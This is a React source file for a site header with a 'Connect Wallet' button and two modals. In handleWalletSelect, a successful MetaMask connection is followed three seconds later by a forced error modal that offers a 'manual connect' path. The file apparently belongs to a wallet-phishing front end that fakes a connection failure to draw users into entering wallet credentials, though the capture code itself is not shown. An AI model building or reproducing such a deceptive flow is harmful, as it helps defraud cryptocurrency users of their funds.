import React, { useState } from 'react';
import './Header.css';
import WalletModal from './WalletModal';
import CardModal from './CardModal';

function Header() {
  const [isWalletModalOpen, setIsWalletModalOpen] = useState(false);
  const [isCardModalOpen, setIsCardModalOpen] = useState(false);
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [connectionState, setConnectionState] = useState(null); // null, 'connected', 'error'

  const openWalletModal = () => setIsWalletModalOpen(true);
  const closeWalletModal = () => setIsWalletModalOpen(false);
  
  // Function to disconnect wallet and reset state
  const disconnectWallet = () => {
    setSelectedWallet(null);
    setConnectionState(null);
    setIsCardModalOpen(false);
    setIsWalletModalOpen(false);
  };
  
  const handleWalletSelect = (wallet) => {
    // Handle canceled connection
    if (wallet.connectionState === 'canceled') {
      disconnectWallet();
      return;
    }
    
    setSelectedWallet(wallet);
    
    // Check if wallet has connection state
    if (wallet.connectionState) {
      setConnectionState(wallet.connectionState);
      
      // If this is MetaMask and initially connected, show the CardModal with error after 3 seconds
      if (wallet.connectionState === 'connected' && (wallet.name === 'MetaMask' || wallet.name.includes('MetaMask'))) {
        // Keep the wallet modal open until error state is shown
        // The wallet modal will close itself when error state is shown
        
        // Show the card modal with error state after MetaMask connects
        setTimeout(() => {
          closeWalletModal();
          setIsCardModalOpen(true);
        }, 3000);
      } else if (wallet.connectionState === 'error') {
        // Close wallet modal for error state
        closeWalletModal();
        
        // Make sure card modal is open to show the error
        if (!isCardModalOpen) {
          setIsCardModalOpen(true);
        }
      } else {
        // For non-MetaMask wallets or other states
        closeWalletModal();
      }
    } else {
      // For regular wallet selection without connection state
      setConnectionState('connected');
      closeWalletModal();
    }
  };
  
  // Handle CardModal close - disconnect wallet and reset state
  const handleCardModalClose = () => {
    setIsCardModalOpen(false);
    // Only disconnect if the connection is in error state
    if (connectionState === 'error') {
      disconnectWallet();
    }
  };
  
  // Handle completion of manual connection
  const handleManualConnectionComplete = () => {
    disconnectWallet();
  };

  return (
    <>
      <header className="header">
        <div className="logo">
          <img src="/logo-BcTF2QaN.svg" alt="Website Logo" className="header-logo" />
        </div>
        <div className="wallet-button">
          {selectedWallet ? (
            <button 
              className={`connected-wallet ${connectionState === 'error' ? 'error-state' : ''}`}
              onClick={disconnectWallet} // Allow disconnection by clicking on the button
            >
              <img 
                src={selectedWallet.image || `/images/wallets/${selectedWallet.logo}.png`} 
                alt={selectedWallet.name} 
                className="wallet-button-icon"
              />
              {connectionState === 'connected' ? 'Connected' : selectedWallet.name}
            </button>
          ) : (
            <button onClick={openWalletModal}>
              <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" className="wallet-icon">
                <circle cx="12" cy="12" r="10"></circle>
                <circle cx="12" cy="12" r="3"></circle>
              </svg>
              Connect Wallet
            </button>
          )}
        </div>
      </header>
      
      <WalletModal 
        isOpen={isWalletModalOpen} 
        onClose={closeWalletModal} 
        onSelect={handleWalletSelect} 
      />
      
      <CardModal
        isOpen={isCardModalOpen}
        onClose={handleCardModalClose}
        onSelect={() => {}}
        onManualComplete={handleManualConnectionComplete}
        showManualConnect={true}
      />
    </>
  );
}

export default Header; 